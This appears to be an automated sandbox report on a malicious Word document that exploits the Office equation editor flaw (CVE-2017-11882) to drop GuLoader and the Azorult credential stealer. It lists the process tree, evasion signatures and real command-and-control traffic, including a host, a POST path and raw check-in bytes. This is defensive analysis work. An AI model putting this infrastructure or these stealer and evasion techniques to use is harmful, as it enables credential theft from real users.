Loading ...

Play interactive tourEdit tour

Analysis Report Invoice and documents.doc

Overview

General Information

Sample Name:Invoice and documents.doc
Analysis ID:287949
MD5:007853972dfeabc5d367f853fa62a59a
SHA1:303fb9261c4279cff64f973081d1b339c2fde73e
SHA256:d3b837c6df7e17d6f6ff9c20066fa5b0064408935d62bacdd4c9b5791002b941
Tags:doc

Most interesting Screenshot:

Detection

Azorult GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Azorult
Yara detected GuLoader
Binary contains a suspicious time stamp
Contains functionality to hide a thread from the debugger
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Yara detected VB6 Downloader Generic
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
PE file contains strange resources
PE file does not import any functions
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries information about the installed CPU (vendor, model number etc)
Searches for user specific document files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2052 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 532 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • hfoewnmm.exe (PID: 2528 cmdline: C:\Users\user\AppData\Roaming\hfoewnmm.exe MD5: 1A6B1BD215DA5B28AF2E26EB47CBD3CD)
      • hfoewnmm.exe (PID: 2628 cmdline: C:\Users\user\AppData\Roaming\hfoewnmm.exe MD5: 1A6B1BD215DA5B28AF2E26EB47CBD3CD)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000003.2136713205.000000001FC44000.00000004.00000001.sdmpJoeSecurity_Azorult_1Yara detected AzorultJoe Security
    00000005.00000003.2136725085.000000001EB50000.00000004.00000001.sdmpJoeSecurity_Azorult_1Yara detected AzorultJoe Security
      Process Memory Space: hfoewnmm.exe PID: 2628JoeSecurity_Azorult_1Yara detected AzorultJoe Security
        Process Memory Space: hfoewnmm.exe PID: 2528JoeSecurity_VB6DownloaderGenericYara detected VB6 Downloader GenericJoe Security
          Process Memory Space: hfoewnmm.exe PID: 2528JoeSecurity_GuLoaderYara detected GuLoaderJoe Security

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
            Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\hfoewnmm.exe, CommandLine: C:\Users\user\AppData\Roaming\hfoewnmm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\hfoewnmm.exe, NewProcessName: C:\Users\user\AppData\Roaming\hfoewnmm.exe, OriginalFileName: C:\Users\user\AppData\Roaming\hfoewnmm.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 532, ProcessCommandLine: C:\Users\user\AppData\Roaming\hfoewnmm.exe, ProcessId: 2528
            Sigma detected: File Dropped By EQNEDT32EXEShow sources
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 532, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\linkscry[1].exe

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\linkscry[1].exeVirustotal: Detection: 19%Perma Link
            Multi AV Scanner detection for submitted fileShow sources
            Source: Invoice and documents.docVirustotal: Detection: 37%Perma Link
            Source: Invoice and documents.docReversingLabs: Detection: 48%

            Exploits:

            barindex
            Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\hfoewnmm.exe
            Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
            Source: global trafficDNS query: name: www.uttaranchaltoday.com
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.176.142:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.176.142:443

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2029405 ET TROJAN Win32/AZORult V3.3 Client Checkin M2 192.168.2.22:49170 -> 103.247.10.55:80
            Source: TrafficSnort IDS: 2029136 ET TROJAN AZORult v3.3 Server Response M1 103.247.10.55:80 -> 192.168.2.22:49170
            Source: Joe Sandbox ViewASN Name: RUMAHWEB-AS-IDRumahwebIndonesiaCVID RUMAHWEB-AS-IDRumahwebIndonesiaCVID
            Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
            Source: global trafficHTTP traffic detected: POST /linkzer/PL341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: officestore.co.idContent-Length: 103Cache-Control: no-cacheData Raw: 00 00 00 26 66 96 42 11 8b 30 64 8b 30 62 ec 26 66 99 40 70 9c 47 70 9d 30 70 9d 37 70 9d 30 14 8b 30 67 eb 40 70 9d 35 70 9c 47 16 8b 30 65 8b 30 63 8b 30 65 8b 30 67 ed 41 70 9d 36 70 9c 47 70 9d 30 70 9d 3a 10 ef 26 66 9b 26 66 9f 26 66 9d 26 66 9d 26 67 ea 26 66 9c 47 13 8b 30 61 ec 45 70 9d 33 70 9d 35 Data Ascii: &fB0d0b&f@pGp0p7p00g@p5pG0e0c0e0gAp6pGp0p:&f&f&f&f&g&fG0aEp3p5
            Source: global trafficHTTP traffic detected: POST /linkzer/PL341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: officestore.co.idContent-Length: 23025Cache-Control: no-cache
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{BD6A1C03-4E04-4856-9DA8-291722E1F767}.tmpJump to behavior
            Source: hfoewnmm.exe, 00000004.00000002.2096174059.00000000031E0000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
            Source: unknownDNS traffic detected: queries for: www.uttaranchaltoday.com
            Source: unknownHTTP traffic detected: POST /linkzer/PL341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: officestore.co.idContent-Length: 103Cache-Control: no-cacheData Raw: 00 00 00 26 66 96 42 11 8b 30 64 8b 30 62 ec 26 66 99 40 70 9c 47 70 9d 30 70 9d 37 70 9d 30 14 8b 30 67 eb 40 70 9d 35 70 9c 47 16 8b 30 65 8b 30 63 8b 30 65 8b 30 67 ed 41 70 9d 36 70 9c 47 70 9d 30 70 9d 3a 10 ef 26 66 9b 26 66 9f 26 66 9d 26 66 9d 26 67 ea 26 66 9c 47 13 8b 30 61 ec 45 70 9d 33 70 9d 35 Data Ascii: &fB0d0b&f@pGp0p7p00g@p5pG0e0c0e0gAp6pGp0p:&f&f&f&f&g&fG0aEp3p5
            Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
            Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
            Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
            Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
            Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
            Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
            Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
            Source: hfoewnmm.exe, 00000004.00000002.2096174059.00000000031E0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
            Source: hfoewnmm.exe, 00000004.00000002.2096174059.00000000031E0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
            Source: hfoewnmm.exe, 00000004.00000002.2097227262.00000000033C7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
            Source: hfoewnmm.exe, 00000004.00000002.2097227262.00000000033C7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
            Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.drString found in binary or memory: http://ocsp.digicert.com0C
            Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.drString found in binary or memory: http://ocsp.digicert.com0N
            Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.drString found in binary or memory: http://ocsp.thawte.com0
            Source: hfoewnmm.exe, 00000004.00000002.2097227262.00000000033C7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
            Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
            Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
            Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
            Source: hfoewnmm.exe, 00000004.00000002.2097227262.00000000033C7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
            Source: hfoewnmm.exe, 00000004.00000002.2096174059.00000000031E0000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
            Source: hfoewnmm.exe, 00000004.00000002.2097227262.00000000033C7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
            Source: mozglue.dll.5.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
            Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.drString found in binary or memory: http://www.mozilla.com0
            Source: hfoewnmm.exe, 00000004.00000002.2096174059.00000000031E0000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
            Source: hfoewnmm.exe, 00000004.00000002.2096174059.00000000031E0000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
            Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.drString found in binary or memory: https://www.digicert.com/CPS0
            Source: 6335590522394284581959.tmp.5.drString found in binary or memory: https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j0j46j0l2j46j0j5.485j0j8&sourceid=chro
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
            Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443

            System Summary:

            barindex
            Office equation editor drops PE fileShow sources
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\linkscry[1].exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\hfoewnmm.exeJump to dropped file
            Source: C:\Users\user\AppData\Roaming\hfoewnmm.exeMemory allocated: 76E20000 page execute and read and write
            Source: C:\Users\user\AppData\Roaming\hfoewnmm.exeMemory allocated: 76D20000 page execute and read and write
            Source: C:\Users\user\AppData\Roaming\hfoewnmm.exeMemory allocated: 76E20000 page execute and read and write
            Source: C:\Users\user\AppData\Roaming\hfoewnmm.exeMemory allocated: 76D20000 page execute and read and write
            Source: C:\Users\user\AppData\Roaming\hfoewnmm.exeCode function: 4_2_003214B7 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\hfoewnmm.exeCode function: 4_2_0032021B EnumWindows,NtSetInformationThread,CloseServiceHandle,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\hfoewnmm.exeCode function: 4_2_00323AF0 NtResumeThread,
            Source: C:\Users\user\AppData\Roaming\hfoewnmm.exeCode function: 4_2_0032374C NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\hfoewnmm.exeCode function: 4_2_003213B7 NtSetInformationThread,CloseServiceHandle,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\hfoewnmm.exeCode function: 4_2_00323C1D NtResumeThread,
            Source: C:\Users\user\AppData\Roaming\hfoewnmm.exeCode function: 4_2_0032151A NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\hfoewnmm.exeCode function: 4_2_003235A6 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\hfoewnmm.exeCode function: 4_2_003231AA NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\hfoewnmm.exeCode function: 4_2_00321994 NtSetInformationThread,CloseServiceHandle,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\hfoewnmm.exeCode function: 4_2_0032027D NtSetInformationThread,CloseServiceHandle,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\hfoewnmm.exeCode function: 4_2_00321685 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\hfoewnmm.exeCode function: 4_2_00323B0C NtResumeThread,
            Source: C:\Users\user\AppData\Roaming\hfoewnmm.exeCode function: 4_2_00323B5D NtResumeThread,
            Source: C:\Users\user\AppData\Roaming\hfoewnmm.exeCode function: 4_2_00323BB4 NtResumeThread,
            Source: C:\Users\user\AppData\Roaming\hfoewnmm.exeCode function: 4_2_004013E4
            Source: C:\Users\user\AppData\Roaming\hfoewnmm.exeCode function: 4_2_00401401
            Source: C:\Users\user\AppData\Roaming\hfoewnmm.exeCode function: 5_3_1F2D85DF
            Source: linkscry[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: hfoewnmm.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: api-ms-win-core-errorhandling-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-debug-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-datetime-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-console-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
            Source: hfoewnmm.exe, 00000004.00000002.2096174059.00000000031E0000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
            Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winDOC@6/61@4/2
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$voice and documents.docJump to behavior
            Source: C:\Users\user\AppData\Roaming\hfoewnmm.exeMutant created: \Sessions\1\BaseNamedObjects\A8AD17B7C-343A2EC6-C0602CB5-39EA5133-2DF4BF06
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCE94.tmpJump to behavior
            Source: C:\Users\user\AppData\Roaming\hfoewnmm.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\hfoewnmm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\hfoewnmm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\hfoewnmm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, softokn3.dll.5.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
            Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, softokn3.dll.5.drBinary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
            Source: hfoewnmm.exe, 00000005.00000003.2131647036.000000001F150000.00000004.00000001.sdmp, nss3.dll.5.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, softokn3.dll.5.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
            Source: hfoewnmm.exe, 00000005.00000003.2131647036.000000001F150000.00000004.00000001.sdmp, nss3.dll.5.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
            Source: hfoewnmm.exe, 00000005.00000003.2131647036.000000001F150000.00000004.00000001.sdmp, nss3.dll.5.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
            Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, softokn3.dll.5.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
            Source: hfoewnmm.exe, 00000005.00000003.2131647036.000000001F150000.00000004.00000001.sdmp, nss3.dll.5.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
            Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, softokn3.dll.5.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
            Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, softokn3.dll.5.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
            Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, softokn3.dll.5.drBinary or memory string: SELECT ALL id FROM %s;
            Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, softokn3.dll.5.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
            Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, softokn3.dll.5.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
            Source: hfoewnmm.exe, 00000005.00000003.2131647036.000000001F150000.00000004.00000001.sdmp, nss3.dll.5.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
            Source: hfoewnmm.exe, 00000005.00000003.2131647036.000000001F150000.00000004.00000001.sdmp, nss3.dll.5.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
            Source: hfoewnmm.exe, 00000005.00000003.2131647036.000000001F150000.00000004.00000001.sdmp, nss3.dll.5.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
            Source: hfoewnmm.exe, 00000005.00000003.2131647036.000000001F150000.00000004.00000001.sdmp, nss3.dll.5.drBinary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
            Source: hfoewnmm.exe, 00000005.00000003.2131647036.000000001F150000.00000004.00000001.sdmp, nss3.dll.5.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
            Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, softokn3.dll.5.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
            Source: Invoice and documents.docVirustotal: Detection: 37%
            Source: Invoice and documents.docReversingLabs: Detection: 48%
            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
            Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\hfoewnmm.exe C:\Users\user\AppData\Roaming\hfoewnmm.exe
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\hfoewnmm.exe C:\Users\user\AppData\Roaming\hfoewnmm.exe
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\hfoewnmm.exe C:\Users\user\AppData\Roaming\hfoewnmm.exe
            Source: C:\Users\user\AppData\Roaming\hfoewnmm.exeProcess created: C:\Users\user\AppData\Roaming\hfoewnmm.exe C:\Users\user\AppData\Roaming\hfoewnmm.exe
            Source: C:\Users\user\AppData\Roaming\hfoewnmm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
            Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130947235.000000001FCE0000.00000004.00000001.sdmp, api-ms-win-crt-locale-l1-1-0.dll.5.dr
            Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2127983806.000000001F2E0000.00000004.00000001.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.5.dr
            Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: hfoewnmm.exe, 00000005.00000003.2131093631.000000001F060000.00000004.00000001.sdmp, mozglue.dll.5.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: hfoewnmm.exe, 00000005.00000003.2131647036.000000001F150000.00000004.00000001.sdmp, nss3.dll.5.dr
            Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130295141.000000001FC54000.00000004.00000001.sdmp, api-ms-win-core-file-l1-2-0.dll.5.dr
            Source: Binary string: ucrtbase.pdb source: hfoewnmm.exe, 00000005.00000003.2131995490.000000001FD20000.00000004.00000001.sdmp, ucrtbase.dll.5.dr
            Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130445299.000000001FC84000.00000004.00000001.sdmp, api-ms-win-core-memory-l1-1-0.dll.5.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: hfoewnmm.exe, 00000005.00000003.2128331675.000000001F330000.00000004.00000001.sdmp, freebl3.dll.5.dr
            Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130225554.000000001FC48000.00000004.00000001.sdmp, api-ms-win-core-debug-l1-1-0.dll.5.dr
            Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130708589.000000001FCA0000.00000004.00000001.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.5.dr
            Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130881671.000000001FCC8000.00000004.00000001.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.5.dr
            Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2128043527.000000001F2D8000.00000004.00000001.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.5.dr
            Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130372042.000000001FC6C000.00000004.00000001.sdmp, api-ms-win-core-heap-l1-1-0.dll.5.dr
            Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2127631724.000000001FE34000.00000004.00000001.sdmp, api-ms-win-core-util-l1-1-0.dll.5.dr
            Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130708589.000000001FCA0000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-1-0.dll.5.dr
            Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130881671.000000001FCC8000.00000004.00000001.sdmp, api-ms-win-crt-environment-l1-1-0.dll.5.dr
            Source: Binary string: vcruntime140.i386.pdbGCTL source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, vcruntime140.dll.5.dr
            Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: hfoewnmm.exe, 00000005.00000003.2131093631.000000001F060000.00000004.00000001.sdmp, mozglue.dll.5.dr
            Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130267131.000000001FC50000.00000004.00000001.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.5.dr
